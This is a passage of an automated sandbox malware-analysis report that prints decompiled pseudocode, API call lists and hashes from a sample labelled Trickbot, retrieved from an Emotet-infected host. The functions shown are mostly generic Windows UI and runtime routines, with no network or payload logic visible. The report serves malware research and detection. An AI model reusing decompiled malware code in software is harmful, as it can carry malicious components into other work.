                          • GetFocus.USER32 ref: 0042ED04
                          • GetDesktopWindow.USER32 ref: 0042ED0C
                          • SendMessageA.USER32(?,0000020A,?,?), ref: 0042ED30
                          • SendMessageA.USER32(00000000,0000020A,?,?), ref: 0042ED4F
                          • GetParent.USER32(00000000), ref: 0042ED58
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSendState$DesktopFocusParentWindow
                          • String ID:
                          • API String ID: 4150626516-0
                          • Opcode ID: c6625e0e4aa98bb0098b428e57794609b0d8ececdf0b99c66cefef8c79aa2cb7
                          • Instruction ID: 5809970d3461b2fdf6e426c59a9eef4763b94e57caca7e5a9e1e61cedd835968
                          • Opcode Fuzzy Hash: c6625e0e4aa98bb0098b428e57794609b0d8ececdf0b99c66cefef8c79aa2cb7
                          • Instruction Fuzzy Hash: 96112732B00335BFEB101BA7BC48EAA76A8EB14794F404433FE02D7240D6F49D4246A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E0043263D(void* __eflags, CHAR** _a4, struct HINSTANCE__* _a8, signed int _a12) {
                          				void* __ebp;
                          				void* _t14;
                          				struct HINSTANCE__* _t18;
                          				CHAR* _t22;
                          				short* _t28;
                          				CHAR** _t36;
                          				void* _t37;
                          				short _t38;
                          
                          				_push(E004326ED);
                          				_t14 = E00432DE3(0x44b2f0);
                          				_t28 = _a8;
                          				_t36 = _a4;
                          				_t37 = _t14;
                          				if( *((short*)(_t37 + 8)) == 0) {
                          					_t18 = GetModuleHandleA("COMCTL32.DLL");
                          					_a8 = _t18;
                          					if(_t18 != 0) {
                          						asm("sbb ecx, ecx");
                          						if(LoadResource(_a8, FindResourceA(_t18, ( ~_a12 & 0x0000000e) + 0x000003ee & 0x0000ffff, 5)) != 0) {
                          							E0041C952(_t26, _t36, _t28);
                          						}
                          					}
                          					_t22 = GlobalAlloc(0x40,  *((intOrPtr*)( *_t36 - 8)) + 1);
                          					 *(_t37 + 4) = _t22;
                          					lstrcpyA(_t22,  *_t36);
                          					 *((short*)(_t37 + 8)) =  *_t28;
                          				}
                          				E00418005(_t36,  *(_t37 + 4));
                          				_t38 =  *((intOrPtr*)(_t37 + 8));
                          				 *_t28 = _t38;
                          				return 0 | _t38 != 0x0000ffff;
                          			}

                          APIs
                            • Part of subcall function 00432DE3: __EH_prolog.LIBCMT ref: 00432DE8
                          • GetModuleHandleA.KERNEL32(COMCTL32.DLL,004326ED,?,?,00000000,?,0042B8C0,?,?,?), ref: 00432666
                          • FindResourceA.KERNEL32(00000000,7C52FF10,00000005), ref: 0043268A
                          • LoadResource.KERNEL32(?,00000000,?,?,00000000,?,0042B8C0,?,?,?), ref: 00432694
                          • GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,0042B8C0,?,?,?), ref: 004326B2
                          • lstrcpyA.KERNEL32(00000000,?,?,?,00000000,?,0042B8C0,?,?,?), ref: 004326BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Resource$AllocFindGlobalH_prologHandleLoadModulelstrcpy
                          • String ID: COMCTL32.DLL
                          • API String ID: 2873249453-3939725795
                          • Opcode ID: 300396df2a23024f370387cdeb0b6393bf04e2ccc6fb2829a469224553747614
                          • Instruction ID: 86f42ea9386f31df8c89762f6029d1ebf92b9594c838981b4cbdf6df4559d254
                          • Opcode Fuzzy Hash: 300396df2a23024f370387cdeb0b6393bf04e2ccc6fb2829a469224553747614
                          • Instruction Fuzzy Hash: C111C1B5500604AFDB109F61DC89E7B77A8EF48710B10942EFD1687290DBB89C40CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E00404366(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				int _t18;
                          				intOrPtr* _t22;
                          				intOrPtr _t30;
                          
                          				if(E004041CD() == 0) {
                          					if(_a4 != 0x12340042) {
                          						L9:
                          						return 0;
                          					}
                          					_t22 = _a8;
                          					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                          						goto L9;
                          					} else {
                          						 *((intOrPtr*)(_t22 + 4)) = 0;
                          						 *((intOrPtr*)(_t22 + 8)) = 0;
                          						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
                          						_t18 = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t30 = 1;
                          						 *(_t22 + 0x10) = _t18;
                          						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
                          						if( *_t22 >= 0x48) {
                          							lstrcpyA(_t22 + 0x28, "DISPLAY");
                          						}
                          						return _t30;
                          					}
                          				}
                          				return  *0x44b0d0(_a4, _a8);
                          			}

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004043A4
                          • GetSystemMetrics.USER32(00000000), ref: 004043BC
                          • GetSystemMetrics.USER32(00000001), ref: 004043C3
                          • lstrcpyA.KERNEL32(?,DISPLAY), ref: 004043E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: System$Metrics$InfoParameterslstrcpy
                          • String ID: B$DISPLAY
                          • API String ID: 1409579217-3316187204
                          • Opcode ID: 803fb7f1ec05114476e0d556a0618346733784654ea8634bb376fe09c94bbbf4
                          • Instruction ID: dc1f3393fd28e443437a049353cbdfcb92f7d4e5a3866b994607ec524a07f0c7
                          • Opcode Fuzzy Hash: 803fb7f1ec05114476e0d556a0618346733784654ea8634bb376fe09c94bbbf4
                          • Instruction Fuzzy Hash: D911E0B1600224EBCF019F659C84A8BBBA8EF49750B005033FE04AA181D2B9D940CBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004123A0(struct HWND__* _a4) {
                          				struct tagRECT _v16;
                          				signed int _t11;
                          				struct HWND__* _t24;
                          				struct HWND__* _t25;
                          
                          				_t24 = _a4;
                          				_t11 = GetWindowLongA(_t24, 0xfffffff0);
                          				GetWindowRect(_t24,  &_v16);
                          				InflateRect( &_v16, 1, 1);
                          				_t25 = GetParent(_t24);
                          				ScreenToClient(_t25,  &_v16);
                          				ScreenToClient(_t25,  &(_v16.right));
                          				if((_t11 & 0x00200000) != 0) {
                          					_v16.right.x = _v16.right.x + 1;
                          				}
                          				return ValidateRect(_t25,  &_v16);
                          			}

                          APIs
                          • GetWindowLongA.USER32(?,000000F0), ref: 004123AD
                          • GetWindowRect.USER32(?,?), ref: 004123BB
                          • InflateRect.USER32(?,00000001,00000001), ref: 004123CA
                          • GetParent.USER32(?), ref: 004123D1
                          • ScreenToClient.USER32(00000000,?), ref: 004123E5
                          • ScreenToClient.USER32(00000000,?), ref: 004123ED
                          • ValidateRect.USER32(00000000,?), ref: 00412401
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                          • String ID:
                          • API String ID: 2275295265-0
                          • Opcode ID: f7dea636adf4077913466b5b5a216d9a79ed7483342d5355e0f9903ac15ee76c
                          • Instruction ID: e7bcff5f8da7a4d5e0e189ee2742adf088c98ecf8293d2a2db97943227d4e63b
                          • Opcode Fuzzy Hash: f7dea636adf4077913466b5b5a216d9a79ed7483342d5355e0f9903ac15ee76c
                          • Instruction Fuzzy Hash: 20F08C72004201BFD7019B64DCC8EBF77BCEB89721F005529FA1592190EB789C4ACB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041CB6C(void* __ecx) {
                          				struct HBRUSH__* _t14;
                          				void* _t18;
                          
                          				_t18 = __ecx;
                          				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                          				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                          				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                          				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                          				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                          				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                          				_t14 = GetSysColorBrush(6);
                          				 *(_t18 + 0x20) = _t14;
                          				return _t14;
                          			}

                          APIs
                          • GetSysColor.USER32(0000000F), ref: 0041CB78
                          • GetSysColor.USER32(00000010), ref: 0041CB7F
                          • GetSysColor.USER32(00000014), ref: 0041CB86
                          • GetSysColor.USER32(00000012), ref: 0041CB8D
                          • GetSysColor.USER32(00000006), ref: 0041CB94
                          • GetSysColorBrush.USER32(0000000F), ref: 0041CBA1
                          • GetSysColorBrush.USER32(00000006), ref: 0041CBA8
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Color$Brush
                          • String ID:
                          • API String ID: 2798902688-0
                          • Opcode ID: 5df08f61adf17e4aa9a15bcdc8f254d034e7b8af24fa43631ef943c2a6205831
                          • Instruction ID: 7db4f0b211aa0832e3ed1348ebccc7ee9ea4e0244eb3583bd5885322743caac1
                          • Opcode Fuzzy Hash: 5df08f61adf17e4aa9a15bcdc8f254d034e7b8af24fa43631ef943c2a6205831
                          • Instruction Fuzzy Hash: EDF0F8719407489BD720AB729D09B47BAE0FFC4B10F02192ED2858BAD0E6F5A401DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042CC04() {
                          				long _t5;
                          				int _t6;
                          
                          				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                          					_t5 = GetVersion();
                          					if((0x80000000 & _t5) != 0) {
                          						L6:
                          						 *0x44b2b8 =  *0x44b2b8 & 0x00000000;
                          						return _t5;
                          					}
                          					_t5 = GetVersion();
                          					if(_t5 != 3) {
                          						goto L6;
                          					}
                          					goto L5;
                          				} else {
                          					L5:
                          					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                          					 *0x44b2b8 = _t6;
                          					return _t6;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Version$MessageRegisterWindow
                          • String ID: MSWHEEL_ROLLMSG
                          • API String ID: 303823969-2485103130
                          • Opcode ID: ec8e88c4bea841d715c55652186ebbf0fbb4d526e658b3d34fc1f032cc14f165
                          • Instruction ID: 52106b3e10c009f1a4f9a9e7a117119cde2b908ece77d3df51b346f72239867c
                          • Opcode Fuzzy Hash: ec8e88c4bea841d715c55652186ebbf0fbb4d526e658b3d34fc1f032cc14f165
                          • Instruction Fuzzy Hash: D0E0D83EA0413656D7255769BC8436D15949749350FB14037C804432549A7C488387AE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00434101(void* __ecx) {
                          				struct HDC__* _t87;
                          				intOrPtr* _t88;
                          				struct HDC__* _t97;
                          				intOrPtr _t98;
                          				int _t100;
                          				struct HDC__* _t110;
                          				int _t122;
                          				intOrPtr* _t126;
                          				void* _t136;
                          				intOrPtr* _t137;
                          				struct HDC__** _t138;
                          				int _t153;
                          				intOrPtr _t157;
                          				signed short _t171;
                          				int _t175;
                          				void* _t178;
                          				void* _t180;
                          
                          				E00405340(E00437BB7, _t180);
                          				_t178 = __ecx;
                          				 *(__ecx + 0x70) =  *(_t180 + 8);
                          				_t87 = E0041BDEB(0x3c);
                          				 *(_t180 + 8) = _t87;
                          				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
                          				if(_t87 == 0) {
                          					_t88 = 0;
                          					__eflags = 0;
                          				} else {
                          					_t88 = E00435B9E(_t87);
                          				}
                          				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
                          				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                          				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
                          				_t175 = 1;
                          				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
                          				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
                          				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
                          				_t97 = E0041BDEB(0x40);
                          				 *(_t180 + 8) = _t97;
                          				_t186 = _t97;
                          				 *(_t180 - 4) = _t175;
                          				if(_t97 == 0) {
                          					_t98 = 0;
                          					__eflags = 0;
                          				} else {
                          					_t98 = E00436147(_t97, _t186);
                          				}
                          				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                          				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
                          				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
                          				if(_t100 != 0) {
                          					_t137 = _t178 + 0x78;
                          					E00420D5B(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
                          					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
                          					 *(_t178 + 0x84) = _t175;
                          					 *((intOrPtr*)( *_t137 + 0x1c))();
                          					_t110 = GetDC( *(_t178 + 0x1c));
                          					 *(_t180 + 8) = _t110;
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
                          					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
                          					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
                          					_t138 = _t178 + 0x80;
                          					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
                          					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
                          					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
                          					_t188 = _t122;
                          					 *(_t178 + 0xf8) = _t122;
                          					if(_t122 != 0) {
                          						_t153 =  *(_t178 + 0xf0);
                          						__eflags = _t122 - _t153;
                          						if(__eflags > 0) {
                          							 *(_t178 + 0xf8) = _t153;
                          						}
                          					} else {
                          						 *(_t178 + 0xf8) = _t175;
                          					}
                          					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
                          					_push(0x43b688);
                          					_push(0x43b688);
                          					_push(_t175);
                          					_push(_t175);
                          					_push(_t175);
                          					E0041FDB2(_t178, _t188);
                          					_t126 =  *((intOrPtr*)(_t178 + 0x114));
                          					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
                          					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
                          					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
                          						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
                          					} else {
                          						 *((intOrPtr*)(_t180 - 0x24)) = 3;
                          						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
                          						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
                          						 *(_t180 - 0x18) = _t175;
                          						if(E0041A10F(_t178, _t175, _t180 - 0x28, 0) == 0) {
                          							E0041A069(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
                          						}
                          					}
                          					E00434FEB(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
                          					_t100 = _t175;
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
                          				return _t100;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00434106
                          • GetDC.USER32(?), ref: 004341F5
                          • ReleaseDC.USER32(?,?), ref: 00434229
                          • GetDeviceCaps.GDI32(?,00000058), ref: 00434242
                          • GetDeviceCaps.GDI32(?,0000005A), ref: 00434252
                            • Part of subcall function 00435B9E: __EH_prolog.LIBCMT ref: 00435BA3
                          • ShowScrollBar.USER32(?,00000001,00000000), ref: 0043431A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CapsDeviceH_prolog$ReleaseScrollShow
                          • String ID:
                          • API String ID: 603669091-0
                          • Opcode ID: 4b03c4a82a617fd816dc7df21d3c25be0cccdcb6e5e453de946e7498aaf37965
                          • Instruction ID: e2c48de82ed0ec2d8506f1a4815bca7e2dea38620cab87d6c2353841960288cc
                          • Opcode Fuzzy Hash: 4b03c4a82a617fd816dc7df21d3c25be0cccdcb6e5e453de946e7498aaf37965
                          • Instruction Fuzzy Hash: 8B715870600A00DFCB29CF69C884AAABBF5FF88710F10456EE56ACB3A1D734E845CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00425911(intOrPtr* __ecx, struct tagPOINT _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				struct tagRECT _v24;
                          				struct tagRECT _v40;
                          				struct tagRECT _v56;
                          				intOrPtr _v60;
                          				long _v64;
                          				char _v72;
                          				intOrPtr _t93;
                          				intOrPtr _t100;
                          				intOrPtr _t101;
                          				long _t104;
                          				long _t105;
                          				long _t109;
                          				void* _t113;
                          				intOrPtr _t116;
                          				intOrPtr* _t119;
                          				void* _t149;
                          				signed int _t151;
                          				signed int _t153;
                          
                          				_t119 = __ecx;
                          				GetClientRect( *(__ecx + 0x1c),  &_v40);
                          				InflateRect( &_v40,  ~( *(_t119 + 0x60)),  ~( *(_t119 + 0x64)));
                          				 *((intOrPtr*)( *_t119 + 0x100))( &_v72);
                          				if( *((intOrPtr*)(_t119 + 0x74)) == 0 ||  *((intOrPtr*)(_t119 + 0x68)) >=  *((intOrPtr*)(_t119 + 0x40))) {
                          					L4:
                          					if( *((intOrPtr*)(_t119 + 0x70)) == 0 ||  *((intOrPtr*)(_t119 + 0x6c)) >=  *((intOrPtr*)(_t119 + 0x44))) {
                          						L9:
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t151 = 0;
                          						_v8 = 0;
                          						if( *((intOrPtr*)(_t119 + 0x6c)) - 1 <= 0) {
                          							L13:
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t153 = 0;
                          							if( *((intOrPtr*)(_t119 + 0x68)) - 1 <= 0) {
                          								L17:
                          								_t93 = _v8;
                          								if(_t93 ==  *((intOrPtr*)(_t119 + 0x6c)) - 1) {
                          									if(_t153 ==  *((intOrPtr*)(_t119 + 0x68)) - 1) {
                          										return 0;
                          									}
                          									_t78 = _t153 + 0x65; // 0x65
                          									return _t78;
                          								}
                          								if(_t153 ==  *((intOrPtr*)(_t119 + 0x68)) - 1) {
                          									return _t93 + 0xc9;
                          								}
                          								_t76 = _t93 + 0x12d; // 0x12d
                          								return _t153 * 0xf + _t76;
                          							}
                          							_t100 = _v24.top;
                          							_t149 = 0;
                          							while(1) {
                          								_push(_a8);
                          								_t101 = _t100 +  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x7c)) + _t149 + 8));
                          								_v24.top = _t101;
                          								_v24.bottom =  *((intOrPtr*)(_t119 + 0x5c)) + _t101;
                          								if(PtInRect( &_v24, _a4.x) != 0) {
                          									goto L17;
                          								}
                          								_t100 = _v24.bottom;
                          								_t153 = _t153 + 1;
                          								_t149 = _t149 + 0xc;
                          								_v24.top = _t100;
                          								if(_t153 <  *((intOrPtr*)(_t119 + 0x68)) - 1) {
                          									continue;
                          								}
                          								goto L17;
                          							}
                          							goto L17;
                          						}
                          						_t104 = _v24.left;
                          						while(1) {
                          							_push(_a8);
                          							_t105 = _t104 +  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t119 + 0x78)) + 8));
                          							_v24.left = _t105;
                          							_v24.right =  *((intOrPtr*)(_t119 + 0x58)) + _t105;
                          							if(PtInRect( &_v24, _a4.x) != 0) {
                          								goto L13;
                          							}
                          							_v8 = _v8 + 1;
                          							_t104 = _v24.right;
                          							_t151 = _t151 + 0xc;
                          							_v24.left = _t104;
                          							if(_v8 <  *((intOrPtr*)(_t119 + 0x6c)) - 1) {
                          								continue;
                          							}
                          							goto L13;
                          						}
                          						goto L13;
                          					} else {
                          						_t109 = _v40.left;
                          						_push(_a8);
                          						_v56.top = _v60;
                          						_v56.left = _t109;
                          						_v56.bottom = _v40.bottom;
                          						_v56.right =  *((intOrPtr*)(_t119 + 0x48)) -  *0x44b354 + _t109;
                          						if(PtInRect( &_v56, _a4.x) == 0) {
                          							goto L9;
                          						}
                          						_push(2);
                          						goto L8;
                          					}
                          				} else {
                          					_push(_a8);
                          					_v56.right = _v40.right;
                          					_v56.left = _v64;
                          					_t116 = _v40.top;
                          					_v56.top = _t116;
                          					_v56.bottom =  *((intOrPtr*)(_t119 + 0x4c)) -  *0x44b354 + _t116;
                          					if(PtInRect( &_v56, _a4) == 0) {
                          						goto L4;
                          					}
                          					_push(1);
                          					L8:
                          					_pop(_t113);
                          					return _t113;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$ClientInflate
                          • String ID:
                          • API String ID: 256450704-0
                          • Opcode ID: 223e93674fd9c974f1877316ad9a598224ee5069628fe09531244644cef74312
                          • Instruction ID: ecc5f8c614df6f32e5f35bfb1dc92d4ae027dd3446eda98f838854cd67b6ac55
                          • Opcode Fuzzy Hash: 223e93674fd9c974f1877316ad9a598224ee5069628fe09531244644cef74312
                          • Instruction Fuzzy Hash: E2612271A01619DFCF09DFA8E884AAEB7B5FF08310B50416AEC06EB245D775EE41CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0040A6E8(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                          				int _v8;
                          				intOrPtr _v20;
                          				short* _v28;
                          				short _v32;
                          				int _v36;
                          				short* _v40;
                          				void* _v56;
                          				int _t31;
                          				int _t32;
                          				int _t37;
                          				int _t43;
                          				int _t44;
                          				int _t45;
                          				void* _t53;
                          				short* _t60;
                          				int _t61;
                          				intOrPtr _t62;
                          				short* _t63;
                          
                          				_push(0xffffffff);
                          				_push(0x43ea70);
                          				_push(E004070AC);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t62;
                          				_t63 = _t62 - 0x18;
                          				_v28 = _t63;
                          				_t31 =  *0x44b954; // 0x1
                          				if(_t31 != 0) {
                          					L6:
                          					if(_t31 != 2) {
                          						if(_t31 != 1) {
                          							goto L18;
                          						} else {
                          							if(_a20 == 0) {
                          								_t44 =  *0x44b970; // 0x0
                          								_a20 = _t44;
                          							}
                          							asm("sbb eax, eax");
                          							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                          							_v36 = _t37;
                          							if(_t37 == 0) {
                          								goto L18;
                          							} else {
                          								_v8 = 0;
                          								E00405B80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                          								_v28 = _t63;
                          								_t60 = _t63;
                          								_v40 = _t60;
                          								E00405360(_t60, 0, _t37 + _t37);
                          								_v8 = _v8 | 0xffffffff;
                          								if(_t60 == 0) {
                          									goto L18;
                          								} else {
                          									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                          									if(_t43 == 0) {
                          										goto L18;
                          									} else {
                          										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						_t45 = _a24;
                          						if(_t45 == 0) {
                          							_t45 =  *0x44b960; // 0x0
                          						}
                          						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                          					}
                          				} else {
                          					_push( &_v32);
                          					_t61 = 1;
                          					if(GetStringTypeW(_t61, 0x43e9dc, _t61, ??) == 0) {
                          						if(GetStringTypeA(0, _t61, 0x43e9d8, _t61,  &_v32) == 0) {
                          							L18:
                          							_t32 = 0;
                          						} else {
                          							_t31 = 2;
                          							goto L5;
                          						}
                          					} else {
                          						_t31 = _t61;
                          						L5:
                          						 *0x44b954 = _t31;
                          						goto L6;
                          					}
                          				}
                          				 *[fs:0x0] = _v20;
                          				return _t32;
			}

